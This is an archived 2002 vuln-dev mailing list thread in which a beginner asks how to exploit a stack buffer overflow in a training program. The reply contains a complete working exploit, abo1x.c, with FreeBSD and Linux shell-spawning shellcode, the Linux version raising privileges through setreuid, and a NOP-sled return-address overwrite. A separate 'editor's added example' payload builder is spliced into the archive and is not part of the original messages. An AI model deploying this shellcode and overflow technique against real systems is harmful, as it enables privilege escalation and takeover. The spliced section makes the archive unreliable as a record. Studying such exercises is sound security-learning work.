Vulnerability Development mailing list archives
RE: Assembler/C References
From: Claes Nyberg <md0claes () mdstud chalmers se>
Date: Wed, 17 Jul 2002 00:23:37 +0200 (MET DST)
You need to know what the execution flow of the program you want to exploit looks like. In order to "see" this, you need to know how memory and the CPU work on the target architecture. My advice is that you write a program in C, and convert each routine into assembly when it is finished. This way you learn enough to understand "Smashing the Stack for Fun and Profit", which will guide you through the shellcode and buffer overflow exploit process.

C links:
http://www.cee.hw.ac.uk/~rjp/Coursewww/Cwww/index.html
http://www.erlenstar.demon.co.uk/unix/faq_toc.html
http://users.actcom.co.il/~choo/lupg/tutorials/
http://www.whitefang.com/sup/secure-faq.html
http://www.developerweb.net/sock-faq/

Assembly links:
http://webster.cs.ucr.edu/Page_AoALinux/aoa.pdf.gz
http://webster.cs.ucr.edu/
http://linuxassembly.org/
http://lsd-pl.net/documents/asmcodes-1.0.2.pdf
http://segfault.net/~scut/cpu/

// CMN

-- Begin abo1x.c --
/*
 * Solution to
 * http://community.core-sdi.com/~gera/InsecureProgramming/abo1.html
 *
 * Claes M. Nyberg <md0claes () mdstud chalmers se>
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* buf + 4 = ret */
#define BUFFSIZE        (256+8)
#define NOP             0x90
#define FBSD_PROG       "./abo1-fbsd"
#define LINUX_PROG      "./abo1-linux"
#define FREEBSD_OFFSET  480
#define LINUX_OFFSET    400

/*
 * FreeBSD shellcode - execv /bin/sh
 * (BSD syscalls take their arguments on the stack, below a dummy
 * return-address slot, hence the extra pushl %eax before int $0x80)
 */
static char fbsdcode[] =
    "\x31\xc0"              /* xorl  %eax, %eax       */
    "\x50"                  /* pushl %eax             */
    "\x68\x2f\x2f\x73\x68"  /* pushl $0x68732f2f  "//sh" */
    "\x68\x2f\x62\x69\x6e"  /* pushl $0x6e69622f  "/bin" */
    "\x89\xe3"              /* movl  %esp, %ebx   path   */
    "\x50"                  /* pushl %eax         NULL   */
    "\x53"                  /* pushl %ebx                */
    "\x89\xe2"              /* movl  %esp, %edx   argv   */
    "\x50"                  /* pushl %eax         envp   */
    "\x52"                  /* pushl %edx         argv   */
    "\x53"                  /* pushl %ebx         path   */
    "\x50"                  /* pushl %eax         dummy ret slot */
    "\xb0\x3b"              /* movb  $0x3b, %al   execve */
    "\xcd\x80"              /* int   $0x80               */
    "\x31\xc0"              /* xorl  %eax, %eax          */
    "\x40"                  /* inc   %eax                */
    "\x50"                  /* pushl %eax                */
    "\x50"                  /* pushl %eax                */
    "\xcd\x80";             /* int   $0x80        exit(1) */

/*
 * Linux shellcode
 * setreuid(geteuid()), setregid(getegid()), execv /bin/sh
 */
static char linuxcode[] =
    "\xb9\xff\xff\xff\xff"  /* movl  $-1, %ecx           */
    "\x31\xc0"              /* xorl  %eax, %eax          */
    "\xb0\x31"              /* movb  $0x31, %al   geteuid */
    "\xcd\x80"              /* int   $0x80               */
    "\x89\xc3"              /* movl  %eax, %ebx          */
    "\xb0\x46"              /* movb  $0x46, %al   setreuid */
    "\xcd\x80"              /* int   $0x80               */
    "\x31\xc0"              /* xorl  %eax, %eax          */
    "\xb0\x32"              /* movb  $0x32, %al   getegid */
    "\xcd\x80"              /* int   $0x80               */
    "\x89\xc3"              /* movl  %eax, %ebx          */
    "\xb0\x47"              /* movb  $0x47, %al   setregid */
    "\xcd\x80"              /* int   $0x80               */
    "\x31\xd2"              /* xorl  %edx, %edx   envp   */
    "\x52"                  /* pushl %edx                */
    "\x68\x2f\x2f\x73\x68"  /* pushl $0x68732f2f  "//sh" */
    "\x68\x2f\x62\x69\x6e"  /* pushl $0x6e69622f  "/bin" */
    "\x89\xe3"              /* movl  %esp, %ebx   path   */
    "\x52"                  /* pushl %edx         NULL   */
    "\x53"                  /* pushl %ebx                */
    "\x89\xe1"              /* movl  %esp, %ecx   argv   */
    "\xb0\x0b"              /* movb  $0xb, %al    execve */
    "\xcd\x80"              /* int   $0x80               */
    "\x31\xc0"              /* xorl  %eax, %eax          */
    "\x40"                  /* inc   %eax                */
    "\xcd\x80";             /* int   $0x80        exit(1) */

/* Current stack pointer; used as the base for guessing where buf lands */
u_long get_esp(void)
{
    u_long esp;

    __asm__ __volatile__("movl %%esp, %0" : "=r" (esp));
    return esp;
}

int main(int argc, char *argv[])
{
    u_char buf[BUFFSIZE+1];
    char *code;
    char *prog;
    u_long addr;

    addr = get_esp() + 20 + BUFFSIZE;

    if (argc < 2) {
        printf("Usage: %s <linux | freebsd> [offset]\n", argv[0]);
        exit(1);
    }
    else if (!strcmp(argv[1], "linux")) {
        code = linuxcode;
        prog = LINUX_PROG;
        addr -= LINUX_OFFSET;
    }
    else if (!strcmp(argv[1], "freebsd")) {
        code = fbsdcode;
        prog = FBSD_PROG;
        addr -= FREEBSD_OFFSET;
    }
    else
        exit(1);

    /* Optional explicit offset overrides the per-OS default */
    if (argv[2])
        addr = get_esp() + 20 + BUFFSIZE - strtoul(argv[2], NULL, 0);

    /* Set NOP's */
    memset(buf, NOP, BUFFSIZE);

    /* Copy shellcode, leaving a few NOPs between it and the return slot */
    memcpy(&buf[BUFFSIZE - strlen(code) - 30], code, strlen(code));

    /* Set return address */
    *((u_long *)&buf[260]) = addr;
    buf[BUFFSIZE] = '\0';

    fprintf(stderr, "Using address 0x%lx\n", *((u_long *)&buf[260]));
    execlp(prog, prog, (char *)buf, (char *)NULL);
    exit(1);
}
-- End abo1x.c --

------------------------------------------------------------------------------
Home: http://www.mdstud.chalmers.se/~md0claes/
------------------------------------------------------------------------------
Citation :
The number of UNIX installations has grown to 10, with more expected.
_The UNIX Programmer's Manual_, Second Edition, June, 1972
------------------------------------------------------------------------------

On Tue, 16 Jul 2002, Jeremy Junginger wrote:
Hey guys,

Thanks for all of the great feedback about assembler and C. I was playing with the code at:
http://community.core-sdi.com/~gera/InsecureProgramming/abo1.html
(Thanks for the link, Claes)

And if it is run, it produces a segmentation fault. After running gdb against the program, I obtain the following data:

[rewt@n00bB0x]# gdb abo1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disass main
Dump of assembler code for function main:
0x8048460 <main>:       push   %ebp
0x8048461 <main+1>:     mov    %esp,%ebp
0x8048463 <main+3>:     sub    $0x108,%esp
0x8048469 <main+9>:     sub    $0x8,%esp
0x804846c <main+12>:    mov    0xc(%ebp),%eax
0x804846f <main+15>:    add    $0x4,%eax
0x8048472 <main+18>:    pushl  (%eax)
0x8048474 <main+20>:    lea    0xfffffef8(%ebp),%eax
0x804847a <main+26>:    push   %eax
0x804847b <main+27>:    call   0x804834c <strcpy>
0x8048480 <main+32>:    add    $0x10,%esp
0x8048483 <main+35>:    leave
0x8048484 <main+36>:    ret
0x8048485 <main+37>:    lea    0x0(%esi),%esi
0x8048488 <main+40>:    nop
0x8048489 <main+41>:    nop
0x804848a <main+42>:    nop
0x804848b <main+43>:    nop
0x804848c <main+44>:    nop
0x804848d <main+45>:    nop
0x804848e <main+46>:    nop
0x804848f <main+47>:    nop
End of assembler dump.
(gdb) quit
[rewt@n00bB0x]#

I guess I don't really know where to go from here. I see that the buffer has space for 256 bytes. Okay, so I run ./abo1 AAAAAAAA(256 times) and it runs okay, then when I run ./abo1 with AAAA(more than 256X) it returns with a segmentation fault. The part I'm not understanding is, after I've overflowed the buffer, how do I know where the next bytes will be stored? Will they be stored at the next memory address (in this case 0x8048480)? Once you know where they are stored, how can you append your code, do you just do a AAAAAA(howevermanytimesyouneedit) and then append your code to the end of it?

Thanks for fielding these beginner questions. They're embarrassing to ask, but everyone's gotta start somewhere.

-Jeremy
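Editor's added example (not part of either message above, and not Claes Nyberg's code): the bytes past the end of abo1's buffer do not go to the next instruction address, they go to the next higher stack addresses, over the saved %ebp and then the saved return address. Jeremy's dump gives the position directly: `lea 0xfffffef8(%ebp)` is `lea -0x108(%ebp)`, so the buffer starts 0x108 = 264 bytes below the saved %ebp and the return address is at buf+268. The `260` in abo1x.c assumes the buffer sits exactly 256 bytes below %ebp, which is why the offset should be read from the target's own frame rather than assumed. The code below lays out the same [NOP sled][shellcode][return address] payload that abo1x.c builds, but takes the offset from the frame displacement, writes the address little-endian, and rejects any payload containing a NUL byte, since strcpy() would stop there. The 5-byte "shellcode" is only the exit(1) tail of the Linux shellcode posted above, the stack address 0xbffff5a0 is a hypothetical guess, and nothing is executed.

```c
/*
 * Added example: payload layout for a strcpy() stack smash, with the return
 * address offset derived from the target frame instead of hard-coded.
 *
 *   low addresses                                       high addresses
 *   +-------------------------------+-----------+--------------------+
 *   | buf: NOP sled ... shellcode   | saved ebp | return address     |
 *   +-------------------------------+-----------+--------------------+
 *   buf                          buf+0x108   buf+0x10c   (abo1 as disassembled)
 */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

#define NOP 0x90

/*
 * Byte offset of the saved return address from the start of the buffer,
 * given the displacement gdb prints for the buffer ("lea -0x108(%ebp)").
 * On i386 the saved %ebp sits directly above the locals and the return
 * address 4 bytes above that.
 */
size_t ret_offset_from_frame(long disp_from_ebp)
{
    return (size_t)(-disp_from_ebp) + 4;
}

/* Bytes of NOP sled in front of the shellcode: the number of distinct
 * return-address guesses that still slide into the code. The 4-byte saved
 * %ebp slot is excluded; it is left as NOPs and never executed. */
size_t sled_length(size_t ret_off, size_t codelen)
{
    return ret_off - 4 - codelen;
}

/*
 * Write [NOP sled][shellcode][NOPs over saved ebp][ret addr][NUL] into out.
 * Returns the payload length excluding the terminating NUL, or 0 if the
 * layout does not fit or any byte up to the end of the return address is
 * 0x00 (strcpy() would truncate the copy there).
 */
size_t build_payload(uint8_t *out, size_t outsz, size_t ret_off,
                     const uint8_t *code, size_t codelen, uint32_t ret_addr)
{
    size_t total = ret_off + sizeof(ret_addr);
    size_t i;

    if (total + 1 > outsz || codelen + 4 > ret_off)
        return 0;

    memset(out, NOP, ret_off);                        /* sled, also covers saved %ebp */
    memcpy(out + ret_off - 4 - codelen, code, codelen);
    for (i = 0; i < sizeof(ret_addr); i++)            /* little-endian, as on i386 */
        out[ret_off + i] = (uint8_t)(ret_addr >> (8 * i));
    out[total] = '\0';

    for (i = 0; i < total; i++)
        if (out[i] == 0)
            return 0;
    return total;
}

/* Constructed check: frame displacement from the gdb dump, a 5-byte stand-in
 * for shellcode (the exit(1) tail of the Linux code above), and a hypothetical
 * stack address. Returns 1 if the layout is as expected. */
int demo_layout_check(void)
{
    static const uint8_t stub[] = { 0x31, 0xc0, 0x40, 0xcd, 0x80 }; /* xorl %eax,%eax; inc %eax; int $0x80 */
    uint8_t payload[512];
    size_t ret_off = ret_offset_from_frame(-0x108);                  /* 268 */
    size_t len = build_payload(payload, sizeof payload, ret_off,
                               stub, sizeof stub, 0xbffff5a0u);

    if (len != ret_off + 4 || payload[0] != NOP || payload[len] != '\0')
        return 0;
    if (memcmp(payload + ret_off - 4 - sizeof stub, stub, sizeof stub) != 0)
        return 0;
    if (payload[ret_off] != 0xa0 || payload[ret_off + 3] != 0xbf)  /* a0 f5 ff bf */
        return 0;
    /* an address with a zero byte (0xbffff500) cannot survive strcpy() */
    if (build_payload(payload, sizeof payload, ret_off, stub, sizeof stub, 0xbffff500u) != 0)
        return 0;
    return 1;
}

int main(void)
{
    size_t ret_off = ret_offset_from_frame(-0x108);

    printf("return address at buf+%zu, NOP sled of %zu bytes\n",
           ret_off, sled_length(ret_off, 5));
    printf("layout check: %s\n", demo_layout_check() ? "ok" : "FAILED");
    return 0;
}
```

The sled is what makes the address guess in abo1x.c (`get_esp() + 20 + BUFFSIZE - offset`) tolerable: any guess that lands inside the NOPs slides into the shellcode, so a longer sled buys more slack in the offset. Every byte before the return address, including the address itself, has to be NUL-free for the same reason strcpy() causes the overflow in the first place.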
Current thread:
- Re: Assembler/C References, (continued)
- Re: Assembler/C References Dullien (Jul 16)
- Re: Assembler/C References Evan (Jul 16)
- Re: Assembler/C References Dave Aitel (Jul 16)
- RE: Assembler/C References John Morris (Jul 16)
- Re: Assembler/C References Claes Nyberg (Jul 16)
- Re: Assembler/C References Ali Saifullah Khan (Jul 15)
- RE: Assembler/C References Jeremy Junginger (Jul 16)
- Re: Assembler/C References John Scimone (Jul 16)
- Re: Assembler/C References KF (Jul 16)
- Re: Assembler/C References KF (Jul 16)
- RE: Assembler/C References Claes Nyberg (Jul 16)